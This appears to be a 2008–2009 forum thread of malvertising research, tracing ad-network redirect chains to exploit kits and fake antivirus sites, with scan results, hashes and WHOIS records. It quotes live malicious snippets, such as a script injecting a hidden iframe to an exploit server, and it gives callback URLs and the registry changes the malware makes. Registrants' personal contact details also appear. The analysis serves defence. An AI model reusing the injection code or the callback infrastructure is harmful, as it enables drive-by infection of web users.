SHA256: 6ed542eceb4ccecb398098b3a4e983f9d4f858f3cac8778d8805240e2d3800a4

QUOTE
File winSexZGcy3vILV.exe received on 12.24.2008 07:06:33
AhnLab-V3 2008.12.22.0 2008.12.24 -
AntiVir 7.9.0.45 2008.12.23 -
Authentium 5.1.0.4 2008.12.24 -
Avast 4.8.1281.0 2008.12.23 -
AVG 8.0.0.199 2008.12.23 -
BitDefender 7.2 2008.12.24 -
CAT-QuickHeal 10.00 2008.12.24 (Suspicious) - DNAScan
ClamAV 0.94.1 2008.12.23 -
Comodo 804 2008.12.23 -
DrWeb 4.44.0.09170 2008.12.24 -
eSafe 7.0.17.0 2008.12.23 Suspicious File
eTrust-Vet 31.6.6276 2008.12.24 -
Ewido 4.0 2008.12.23 -
F-Prot 4.4.4.56 2008.12.24 -
F-Secure 8.0.14332.0 2008.12.24 Suspicious:W32/Malware!Gemini
Fortinet 3.117.0.0 2008.12.24 -
GData 19 2008.12.24 -
Ikarus T3.1.1.45.0 2008.12.24 -
K7AntiVirus 7.10.563 2008.12.23 -
Kaspersky 7.0.0.125 2008.12.24 -
McAfee 5473 2008.12.23 -
McAfee+Artemis 5473 2008.12.23 -
Microsoft 1.4205 2008.12.24 -
NOD32 3715 2008.12.24 -
Norman 5.80.02 2008.12.23 -
Panda 9.0.0.4 2008.12.23 -
PCTools 4.4.2.0 2008.12.23 -
Prevx1 V2 2008.12.24 Fraudulent Security Program
Rising 21.09.14.00 2008.12.23 -
SecureWeb-Gateway 6.7.6 2008.12.24 -
Sophos 4.37.0 2008.12.24 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2008.12.24 -
TheHacker 6.3.1.4.199 2008.12.23 -
TrendMicro 8.700.0.1004 2008.12.24 -
VBA32 3.12.8.10 2008.12.23 -
ViRobot 2008.12.24.1533 2008.12.24 -
VirusBuster 4.5.11.0 2008.12.23 -

Family: Vundo - ThreatExport Report.
______________________________

We ran into ashoping.com & friends before but now they are coming through Right Media / Yahoo and thus a higher amount of users will be affected. From adspot200.com we are redirected to ad.yieldmanager.com where a script will lead us to the advertiser. Pink entries are the redirects we will experience.

The page at banners.exitexchange.com reveals 3 elements.

hits.revenuestreet.com - clicktag
ban.revenuestreet.com - banner to be displayed

iframe to count.exit1208.com

At count.exit1208.com we are redirected to ashoping.com which contains an iframe at the bottom of the page leading us to the infamous 85.12.43.126. The sid appended to the URL is a session ID which is only valid for a short period of time.

85.12.43.126 contains a highly obfuscated JavaScript.

Once decoded we discover several exploits:

MDAC: Arbitrary file download via the Microsoft Data Access Components (MDAC)
Windows Media Encoder: Windows Media Encoder buffer overflow
Yahoo! Webcam Uploader: Yahoo! Webcam Uploader buffer overflow via long 'server' property followed by an invocation of the 'receive' method
Aurigma Photo Uploader: Aurigma Photo Uploader overflow in the ExtractIpct and ExtractExif properties
ActiveVoice: ActiveVoice buffer overflow via ModeName parameter in the FindEngine function
Yahoo! Webcam Viewer: Yahoo! Webcam Viewer buffer overflow via long server property followed by an invocation of the send method
iMesh IMWebControl: iMesh IMWebControl overflow via the SetHandler method
Ask Toolbar: Ask Toolbar stack-based overflow via the ShortFormat property
WebViewFolder: WebViewFolder integer overflow via the setSlice method
iMesh IMWebControl DoS: iMesh IMWebControl denial of service via empty ProcessRequestEx method

All will try to get style.exe - renamed to winSexZGcy3vILV.exe - from 78.26.179.61 on your computer. In addition to those listed above, we also notice the presence of a PDF exploit - 85.12.43.126/css/pdf.php?id=0&sid=[*]. Shellcode will lead to the same executable.

count.exit1208.com acts as a rotator, you might encounter other redirects from there. All will lead to websites containing infections & executables. Example:

litefly.net/exit/promo/
litefly.net/exit.php
litefly.net/popup/pop1_2007-09-04.htm
litefly.net/popup/pre_2007-09-04.htm
litefly.net/popup/pop2_2007-09-04.htm
litefly.net/unpack/index.php
litefly.net/unpack/load.php

winmBZzr.exe

File size: 41984 bytes
MD5...: c54cf6752d014d1c68d82f300fc8194c
SHA1..: ad0c13814ad26dab06c63ab6b7cf18ef78b672ee
QUOTE
CAT-QuickHeal 10.00 2008.12.24 (Suspicious) - DNAScan
Microsoft 1.4205 2008.12.24 Trojan:Win32/Hiloti.gen!A

<h4>

IP details

</h4>
banners.exitexchange.com - 64.146.132.39

Updated Date: 10-nov-2008
Name Server: NS15.DOMAINCONTROL.COM - NS16.DOMAINCONTROL.COM
Registrant: Modena Incorporated
______________________________

hits.revenuestreet.com - 67.201.62.189 & ban.revenuestreet.com - 67.201.36.8

Domain name: revenuestreet.com
Updated Date: 07-jul-2008
Name Server: DNS1.NAME-SERVICES.COM - DNS2.NAME-SERVICES.COM - DNS3.NAME-SERVICES.COM -DNS4.NAME-SERVICES.COM - DNS5.NAME-SERVICES.COM

Registrant Contact: stellar
Ben Jamin (nick@themediacrew.com)
+1.4076510288
Fax: +1.4072729211
7512 Dr. Phillips Blvd
# 50 Suite 168
Orlando, FL 32819
US
______________________________

count.exit1208.com - 64.146.132.39

Updated Date: 11-dec-2008
Creation Date: 11-dec-2008
Name Server: NS61.DOMAINCONTROL.COM - NS62.DOMAINCONTROL.COM
Registrar: GODADDY.COM, INC

Registrant: Hunter, Bryan bryan@modenainc.com
921 SW Washington St
Suite 228
Portland, Oregon 97205
United States
(503) 241-1091
______________________________

ashoping.com - 85.12.43.124

Updated Date: 13-oct-2008
Creation Date: 13-oct-2008
Name Server: NS1.ASHOPING.COM - NS2.ASHOPING.COM - NS3.ASHOPING.COM - NS4.ASHOPING.COM
Registrar: MONIKER ONLINE SERVICES, INC

Registrant [1516145]: Helen Nikolson helen.nikolson@gmail.com
PO Box 441
Road town
null
0000
VG

domains sharing nameservers : automobilewdew.com | bigmp3online.com | buynow21.com | detoxitnow.com | financestoc.com | greatlakemusic.com | mp3cdt.com | travelcardclub.com
______________________________

85.12.43.126 - 85.12.43.126.xentronix.nl

IP Location: Netherlands Xentronix
inetnum: 85.12.43.0 - 85.12.43.255
netname: NL-XENTRONIX
descr: Xentronix
______________________________

78.26.179.61

IP Location: Ukraine Odessa Renome-service: Joint Multimedia Cable Network
inetnum: 78.26.161.0 - 78.26.191.255
netname: RENOME-SERVICE
descr: Renome-Service: Joint Multimedia Cable Network
______________________________

litefly.net - 66.232.97.163

Updated Date: 04-dec-2008
Creation Date: 04-dec-2008
Name Server: NS1.NAMESELF.COM - NS2.NAMESELF.COM
Registrar: REGTIME LTD.

Registrant: Dmitrij Belov
Email: joker500@mail.ru
Organization: Private person
Address: ul. Pushkina d.12-12
City: Moskva
State: Moskovskaya
ZIP: 127000
Country: RU
Phone: +7.9050294354

Kimberly

Dec 24 2008, 06:52 PM

<h4>

clicksadssystems.com - secured-live-scan.com - updatedownloadlists.com - protecton-antivirus-scan.com

</h4>
Redirects

clicksadssystems.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
secured-live-scan.com/2009/1/en/freescan.php?id=[*]

updatedownloadlists.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
protecton-antivirus-scan.com/2009/1/en/freescan.php?id=[*]

clicksadssystems.com - 78.46.205.65

IP Location - Germany - Siarhei Shandrokha
Updated Date: 21-dec-2008
Creation Date: 21-dec-2008
Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
Registrar: BIZCN.COM, INC.

secured-live-scan.com - 78.46.205.69

IP Location - Germany - Siarhei Shandrokha
Updated Date: 22-dec-2008
Creation Date: 22-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

updatedownloadlists.com - 78.46.216.238

IP Location - Germany - Siarhei Shandrokha
Updated Date: 21-dec-2008
Creation Date: 21-dec-2008
Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
Registrar: BIZCN.COM, INC.

protecton-antivirus-scan.com - 78.46.216.237

IP Location - Germany - Siarhei Shandrokha
Updated Date: 22-dec-2008
Creation Date: 21-dec-2008
Name Server: NS1.FASTFREETEST.CN - NS2.FASTFREETEST.CN - NS3.FASTFREETEST.CN
Registrar: BIZCN.COM, INC.

91.211.64.47

ns1.fastfreetest.cn
ns1.freehostns.com
ns1.managehostdns.com

78.46.205.70

ns2.fastfreetest.cn
ns2.freehostns.com
ns2.managehostdns.com

64.86.17.44

ns2.freefastdns.com
ns3.fastfreetest.cn
ns3.freehostns.com
ns3.freeyourdns.com
ns3.managehostdns.com

Kimberly

Dec 25 2008, 05:03 PM

<h4>

WARNING: The New Republic - Sell Your Home

</h4>
Another malvertizement featuring Sell Your Home aka International Listings - www.intlistings.com - distributed by adserver.adtechde.net is being displayed at The New Republic - www.tnr.com

Screenshot in situ.

Banner.

adserver.adtechde.net/adiframe|3.0|124|67983745|4|1|ADTECH;loc=700;grp=tnr/tnr_intllist160x600.swf

Campaign.

adclickmate.net/_stat.gif?src=[*]

The malvertizement has been acquired by DoubleClick. Both did already hit the news on Dec 14 2008 - WARNING: www.startribune.com - ETRADE. DoubleClick should have terminated all transactions and banners from adserver.adtechde.net at that time; not checking their contracts and leaving those malicious banners live is simply irresponsible from them.
FYI, the same day I blogged about the presence of a malicious banner featuring Sell Your Home at adserver.adtechde.net.

Kimberly

Dec 27 2008, 07:00 PM

<h4>

securedliveclicks.com - antivirusdefencescanner.com - securedprotectedclicks.com - liveantiviruspccheck.com

</h4>
More Antivirus 2009 - 360Redirects

securedliveclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
antivirusdefencescanner.com/2009/1/en/freescan.php?id=[*]

securedprotectedclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
liveantiviruspccheck.com/2009/1/en/freescan.php?id=[*]

securedliveclicks.com - 88.198.0.143

Updated Date: 22-dec-2008
Creation Date: 22-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

antivirusdefencescanner.com - 88.198.0.143

Updated Date: 26-dec-2008
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

securedprotectedclicks.com - 78.46.101.234

Updated Date: 22-dec-2008
Creation Date: 22-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

liveantiviruspccheck.com - 84.16.224.115 / 64.20.38.91 / 69.10.49.193 / 78.47.248.118 / 78.159.118.144

Updated Date: 26-dec-2008
Creation Date: 23-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

Kimberly

Dec 31 2008, 04:21 AM

<h4>

WARNING : MySpace - prolinar.com

</h4>
The actors.

Advertiser: Userplane Integrated Ad Revenue Share
MySpace: a very popular social network
prolinar.com involved in at least 2 known redirects
1. allrecipes.com - Rhapsody MP3 Store
2. expedia.com - Rhapsody MP3 Store

Screenshot in situ.

As seen on the screenshot, we got our "gift" while connecting to MySpace Chat. This time the bad guys went a step ahead and a little "bonus" has been added to the usual redirect to Antivirus 2009 / 360.

<h4>

Traces & Analysis

</h4>
Advertising request handled by userplane.com with the redirect leading to www.prolinar.com

We discover several elements on the webpage at www.prolinar.com

Only the bold elements are of any interest and will be detailed below.
Click target: www.perfectmatch.com/?cp=72id
Banner: www.prolinar.com/banners-db/-MISC Dating/PerfectMatch.com_728x90.jpg

IFrame: test.3tmp3.com/fie/index.php
action_URL = media-drive.com/system-info.html
Escaped text

CODE
document.write(unescape("%3Cscript src='http://" + cur_domain + "/includes02a.js' type='text/javascript'%3E%3C/script%3E"));

<h4>

media-drive.com/system-info.html

</h4>
Nothing outstanding here ... the usual redirects. The escaped text points to includes02a.js as above; which doesn't contain anything special.

CODE
if (top.location!= self.location) {
        top.location = action_URL;
    } else {
        window.location = action_URL;
    }

Redirects.
securedliveclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
advanced-antivirus-scanner.com/2009/1/freescan.php?nu=[*]
advanced-antivirus-scanner.com/2009/1/en/freescan.php?id=[*]

<h4>

test.3tmp3.com/fie/index.php

</h4>
With this page, we jump to a higher level ... the script "living" there is what triggerd the ProcessGuard alert in the screenshot.

You will have to resist against several exploit attempts or get screwed in case you fail.

mdac (MS06-014)
- BD96C556-65A3-11D0-983A-00C04FC29E36
- BD96C556-65A3-11D0-983A-00C04FC29E30
- AB9BCEDD-EC7E-47E1-9322-D4A210617116
- 0006F033-0000-0000-C000-000000000046
- 0006F03A-0000-0000-C000-000000000046
- 6e32070a-766d-4ee6-879c-dc1fa91d2fc3
- 6414512B-B978-451D-A0D8-FCFDF33E833C
- 7F5B7F63-F06F-4331-8A26-339E03C0AE3D
- 06723E09-F4C2-43c8-8358-09FCD1DB0766
- 639F725F-1B2D-4831-A9FD-874847682010
- BA018599-1DB3-44f9-83B4-461454C84BF8
- D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
- E8CCCDDF-CA28-496b-B050-6C07C962476B
WebViewFolder setSlice - WebViewFolderIcon.WebViewFolderIcon.1
CreateControlRange - Microsoft 'msdds.dll' COM Object - EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (MS05-052)
NCTAudioFile2 - 77829F14-D911-40FF-A2F0-D11DB8D6D0BC
DirectAnimation.PathControl
collab.CollabEmailInfo - PDF exploit
Microsoft Office Snapshot Viewer ActiveX - snpvw.Snapshot Viewer Control.1

As a result we bump into an executable or the PDF file but both roads will lead to Rome, don't worry.

File winNOFZCyliz5mmRR.exe received on 12.30.2008 19:34:24 (CET)
Prevx1 V2 2008.12.30 Malicious Software

Additional information
File size: 22016 bytes
MD5...: aed7ff081368ed161dc465073b495621
SHA1..: 2f47945de7d64e37f19b1f16b28ac81110db6295
SHA256: fbf6ded11754699cffea12a49cd13a993794e9ef5a640154e28d78a56ecca99a
Result: 1/39
______________________________

File pdf.php received on 12.30.2008 20:34:35 (CET)
a-squared 4.0.0.73 2008.12.30 Exploit.Win32.Pdfjsc.G!IK
AntiVir 7.9.0.45 2008.12.30 HEUR/HTML.Malware
Avast 4.8.1281.0 2008.12.30 JS:Pdfka-N
BitDefender 7.2 2008.12.30 Exploit.PDF-JS.Gen
GData 19 2008.12.30 JS:Pdfka-N
Ikarus T3.1.1.45.0 2008.12.30 Exploit.Win32.Pdfjsc.G
Kaspersky 7.0.0.125 2008.12.30 Exploit.JS.Pdfka.dc
SecureWeb-Gateway 6.7.6 2008.12.30 Heuristic.HTML.Malware
Sophos 4.37.0 2008.12.30 Troj/PDFJs-G
Symantec 10 2008.12.30 Bloodhound.Exploit.196

Additional information
File size: 8453 bytes
MD5...: 78278a100af54b228fb9fd96e74f1961
SHA1..: 4a9d17c6698878f3c20847f336eeb209e7bb2cbd
SHA256: e2f999a29ecc713e6a09a1906870bbc87084e6b5db1da4da8a995a7b49e1bab8
Result: 10/39

load.exe saved as winNOFZCyliz5mmRR.exe

Upon execution this file writes into the memory space of svchost.exe. A couple of moments later we see an outbound request to 210.83.85.100

orzsystem.cn/ldr/controller.php?action=bot&entity_list=&uid=[*]&first=[*]&guid=[*]&rnd=[*]

Files added:

%System%\digeste.dll

Registry changes:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders]
SecurityProviders = "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll"

Mutex objects:

_SYSTEM_A6F2DE5_
_SYSTEM_F2A5DE7_

digeste.dll:

File digeste.dll received on 12.30.2008 19:58:53 (CET)
Sophos 4.37.0 2008.12.30 Sus/Behav-258

Additional information
File size: 22016 bytes
MD5...: c388c7ef7f5047ab8b0f9ab99cf14cbc
SHA1..: a551dbb244a5bc7e0a54d9c4c3d7b54ca6a81220
SHA256: fffb728fc3bafbf4c13f2bb5fe6e9f5bfd598284f753832785bae75b230f7cd5
Result: 1/39

<h4>

www.userplane.com

</h4>
There is a point on which I would like to draw your attention after we saw what happend on the MySpace chat.

Who is www.userplane.com - Userplane Integrated Ad Revenue Share

UserPlane

QUOTE

Userplane™ is the world’s premier social software provider for online communities. Our award-winning technology makes it easy for website owners and publishers to add free content, functionality and advertising in an instant. Grow your community – and your revenue – with Userplane.

UserPlaneApps

QUOTE

As we notice, they are integrated in many web solutions and very present in Webchat / Instant Messaging software such as MySpace Chat, Paltalk, Facebook, Friendster, AIM ... This overall presence might also explain why people keeping complaining about redirects on Friendster, MySpace, Facebook, DeviantArt, etc for several weeks now. This is a huge advertising network.

More reading if you wish:

http://wiki.userplane.com/docs/doku.php?id=platforms
http://wiki.userplane.com/docs/doku.php?id=start
http://dev.aol.com/aim/advertising
http://www.reuters.com/article/pressReleas...2008+BW20080717

Here we go again … for several months we did express our grief about the lack of investigation when acquiring advertisements and provided information on what should be paid attention to. Sandi, I & others have been following this "saga" for over a year now and each month, week, day things just get worse. For the past weeks we saw (again) an increase in malicious advertising. Forums and their respective helpers are overwhelmed by infected computers and I’m pretty sure that lately more than 50% have been a victim of malvertizements, this is unacceptable.

Kimberly

Dec 31 2008, 06:23 PM

<h4>

IP Details from the MySpace incident

</h4>
At the time of the first incident, www.prolinar.com was registered to Estdomains. Since they have been terminated, www.prolinar.com registrar is now Directi.

www.prolinar.com - 94.76.208.14

Updated Date: 08-dec-2008
Creation Date: 18-nov-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.PROLINAR.COM - NS2.PROLINAR.COM
Registrant: Thomas Schultz
Thomas Schultz (ts8317@googlemail.com)
Friedrichstaler Allee 50
Karlsruhe
Baden-Wurttemberg,76131
DE
Tel. +072.697040
______________________________

test.3tmp3.com

NO IP - domain has been suspended today.

Updated Date: 31-dec-2008
Creation Date: 17-feb-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM

Registrant: Konstantin Fetisov (akafitis@gmail.com)
4-1-62 Dm. Ulyanova street
Moscow
Moskovskaya oblast,119333
RU
Tel. +7.4955178378
______________________________

media-drive.com

NO IP - domain has been suspended today.

Updated Date: 31-dec-2008
Creation Date: 13-oct-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Registrant: Thomas Schultz
Thomas Schultz (ts8317@googlemail.com)
Friedrichstaler Allee 50
Karlsruhe
Baden-Wurttemberg,76131
DE
Tel. +072.697040
______________________________

orzsystem.cn - 210.83.85.100

Registration Date: 2008-12-11 01:16
Expiration Date: 2009-12-11 01:16
ROID: 20081211s10001s93687983-cn
Registrant Organization: BestHost, icn.
Registrant Name: LucasSteven
Administrative Email: steven_lucas_2000@yahoo.com
Name Server:ns1.dcn5100.com - ns2.dcn5100.com
______________________________

advanced-antivirus-scanner.com - 88.198.0.143

Registered: 25 December 2008
Registrar: TODAYNIC.COM
Name Servers: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrant: Valensia M Dobbson - valensiam@yahoo.com
______________________________

While Directi did suspend 2 of the involved domains today, I don't get why www.prolinar.com wasn't suspended either. The registrant is also Thomas Schultz ... I'm expecting to see new redirects set up at www.prolinar.com very soon ... if not already done.

Kimberly

Jan 2 2009, 05:20 PM

<h4>

Some never learn ...

</h4>
Yahoo

CODE
</script><iframe width="468" height="60" frameborder="0" src="http://a2.warmnetworks.com/ad?zo=52&w=468&h=60&ct=1&t=1230913333" scrolling="no" marginwidth="0" marginheight="0"></iframe></body></html>

a2.warmnetworks.com

CODE
<iframe width="468" height="60" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/vh?z=BootCamp&dim=335832"><script
language=JavaScript
src="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/vj?z=BootCamp&dim=335832&abr=$scriptiniframe"></script><noscript><a
href="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/cc?z=BootCamp"><img
src="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/vc?z=BootCamp&dim=335832&abr=$imginiframe"
width="468" height="60" border="0"></a></noscript></iframe>

ads.bootcampmedia.com

CODE
document.write('<scri' + 'pt type="text/javascript" src="http://banners.exitexchange.com/banner_js?pubid=' + pubid + '&bsize=' + bsize + '&rnd=' + rnd + '&ts=' + ts.getTime() + '"></sc' + 'ript>');

banners.exitexchange.com

CODE
document.write('<div style="width:468px;height:60px">');document.write('<a href=\'http://www.thinkhost.com?p=82369a5f&b=4d673960\' target="_blank">\n<img src=\'http://www.affiliates.thinkhost.com/apn/scripts/sb.php?p=82369a5f&b=4d673960\' \nalt="Special web hosting offer - LIMITED TIME ONLY" title="Special web hosting offer - LIMITED TIME ONLY"></a><iframe src="http://count.exit1208.com/exit/1215643?3388083" border="0" scrolling="no" style="visibility: hidden" width="1" height="1"></iframe>');document.write('</di'+'v>');

count.exit1208.com

CODE
<iframe src="http://ashoping.com/?sid=aff0048" name="EEmF1" height="100%" width="100%" scrolling="auto" marginwidth=0 marginheight=0></iframe></td>

ashoping.com (Dec 24 2008)

CODE
<script language='JavaScript'>
            var iframe = document.createElement('iframe');
            var sgKSL = 'http://BZi7GWiTay/css/index.php?sid=';
            iframe.height   = 1;
            iframe.width    = 1;
            iframe.src      = sgKSL.replace('BZi7GWiTay', '85.12.43.127') + 'e0d3e0d3e2dbebd8eadbe68fff90f88bead7e2d4e5dceadbd7';
            document.body.appendChild(iframe);
        </script>

<h4>

IP Details

</h4>
domains sharing nameservers

ashoping.com | automobilewdew.com | bigmp3online.com | buynow21.com | detoxitnow.com | financestoc.com | greatlakemusic.com | mp3cdt.com | travelcardclub.com
______________________________

a2.warmnetworks.com - 67.221.32.207

Hidden behind Domains by Proxy, Inc.
Domain servers in listed order:
NS11.DOMAINCONTROL.COM
NS12.DOMAINCONTROL.COM
______________________________

ads.bootcampmedia.com - 64.237.103.151

aka rotator.adjuggler.com <-- I know exactly who to contact.
Updated Date: 05-dec-2008
______________________________

AdJuggler.

The "rotator.adjuggler.com" case
Photobucket ... more malvertizing problems
Photobucket - AdJuggler aka efx.add50.com / rotator.adjuggler.com

Kimberly

Jan 3 2009, 02:53 AM

<h4>

gotoyourclicks.cn - advanced-anti-virus-scanner.com - clickoverridesystem.cn - anti-virus-secure-scanner.com

</h4>
More Antivirus 2009 Redirects

gotoyourclicks.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
advanced-anti-virus-scanner.com/2009/1/en/freescan.php?id=[*]

clickoverridesystem.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
anti-virus-secure-scanner.com/2009/1/en/freescan.php?id=[*]

gotoyourclicks.cn - 78.46.101.234

Registration Date: 2008-12-25 18:49
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: promasteryouth@gmail.com

Google Translation : Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn

advanced-anti-virus-scanner.com - 64.20.38.91 / 69.10.49.193 / 75.126.74.181 / 78.159.118.144 / 84.16.224.115

Updated Date: 29-dec-2008
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com

clickoverridesystem.cn - 91.211.64.68

Registration Date: 2008-12-25 18:49
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: promasteryouth@gmail.com

Google Translation : Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn

anti-virus-secure-scanner.com - 89.149.227.196

Updated Date: 29-dec-2008
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com

Kimberly

Jan 3 2009, 06:06 PM

<h4>

WARNING: PhotoBucket - Free Apple iPhone

</h4>
A yet unseen malvertizement offering a Free Apple iPhone is being displayed at Photobucket.

Screenshot in situ.

Banner.

ad.getfreeiphone.us/swf/235754_160x600g.swf

Campaign.

ad.getfreeiphone.us/rotator.php?campaign=[*]
ad.getfreeiphone.us/in.cgi?[*]
ad.getfreeiphone.us/swf/235754_160x600g.swf
tds.traffrotator.info/?paramss=[*]
adtds.mgrotator.info/in.cgi?[*]
best-antivirus-scanner-ever.info/scan.php?campaign=[*]

Cookie for ad.getfreeiphone.us is set to adtds2.promoplexer.com.

Clicktag

I usually don't display the Clicktags from the malvertizements but this time the website itself is owned by the same guys.

getfreeiphone.us/index.php?campaign=[*]

This time we end up at Antivirus 2010.

<h4>

IP Details

</h4>
ad.getfreeiphone.us - 70.38.19.203

Domain Registration Date: Thu Nov 06 11:53:56 GMT 2008
Sponsoring Registrar: ENOM, INC.
Name Server: NS1.GETFREEIPHONE.US - NS2.GETFREEIPHONE.US
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com

getfreeiphone.us - 70.38.19.206

Domain Registration Date: Thu Nov 06 11:53:56 GMT 2008
Sponsoring Registrar: ENOM, INC.
Name Server: NS1.GETFREEIPHONE.US - NS2.GETFREEIPHONE.US
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com

tds.traffrotator.info - 67.205.93.102

Created On:08-Dec-2008 22:38:19 UTC
Last Updated On:09-Dec-2008 11:22:33 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Name Server:NS1.TRAFFROTATOR.INFO - NS2.TRAFFROTATOR.INFO
Registrant Name: WhoisGuard Protected

adtds.mgrotator.info - 67.205.93.102

Created On:26-Dec-2008 16:42:08 UTC
Last Updated On:26-Dec-2008 17:49:26 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Name Server:NS1.MGROTATOR.INFO - NS2.MGROTATOR.INFO
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com

best-antivirus-scanner-ever.info - 67.205.75.14

Created On:26-Dec-2008 19:31:22 UTC
Last Updated On:26-Dec-2008 19:50:39 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Name Server:NS1.BEST-ANTIVIRUS-SCANNER-EVER.INFO - NS2.BEST-ANTIVIRUS-SCANNER-EVER.INFO
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com

Kimberly

Jan 4 2009, 02:37 AM

<h4>

Seen in the wild ...

</h4>
PG Alert.

Cause.

File 1.swf received on 01.04.2009 02:43:14 (CET)

Additional information
File size: 16570 bytes
MD5...: fc078089030cd99081c6e4381afc5451
SHA1..: 1538ca9fa824de3f6a80206eca4090ec7abceefa
SHA256: e7f0bfb12c34ef95951cb528d098cfce4900a812031c961c3886670fd9fbe626
packers (Kaspersky): Swf2Swc
Results: 0/38

Flash Code.

Executable.

File wJQs.exe received on 01.04.2009 03.25.47 (CET)

Kaspersky 7.0.0.125 2009.01.04 Trojan.Win32.Agent.bcuy
Prevx1 V2 2009.01.04 Information Stealer
Sophos 4.37.0 2009.01.04 Troj/Daonol-Fam
TrendMicro 8.700.0.1004 2009.01.02 PAK_Generic.001

Additional information
File size: 13312 bytes
MD5...: 5929b0d056a0c549ed53fe2f53370999
SHA1..: 602a66bb323b556a190c0f5964e0a73428d92d0d
SHA256: 65e097c7eb85ea3cce3c4d856942fb2273036a9fe4d0423acd29f22e9b5d1897
Results: 4/38

Kimberly

Jan 5 2009, 02:03 PM

<h4>

TrafficHunter

</h4>
ALL advertising content from TrafficHunter - traffichunter.net & traffichunters.net - should be treated with EXTREME CAUTION

Compared to OlympicMedia 1 spelling error has been fixed on the main page but not on the other pages. The site template also refers to Olympic Media as seen below.

CODE
<a href="index.html" tppabs="http://traffichunter.net/index.html" title="OLYMPIC MEDIA"><div id="olimpic">TRAFFIC<b>HUNTER</b></div></a>

Furthermore, the images referenced in traffichunter.net/styles.css are linking to olympicmedia.net.

CODE
#menu {
    height:38px;
    margin: 0 62px;
    font-family: "Myriad Pro";
    font-size: 14px;
    color: #f9f9f9;
    background-image: url("img/dot.gif"/*tpa=http://olympicmedia.net/img/dot.gif*/);
    background-position: right 3px;
    background-repeat: no-repeat;
    clear: both;
    overflow: hidden;
}

You can read all the details at Sandi's site. You will see that she also shows a connection between ashoping.com and traffichunters.net

On small detail I would like to draw your attention on is the fact that almost all sites sharing their IP with ashoping.com have been involved in distributing malware although they are registered to different people. - Ref.

Kimberly

Jan 8 2009, 11:36 PM

<h4>

becometrueclick.cn - livepcantivirusscan.com - protecteduser.cn - live-antivirus-pc-scan.com

</h4>
More Antivirus 2009 Redirects

becometrueclick.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
livepcantivirusscan.com/2009/1/en/freescan.php?id=[*]

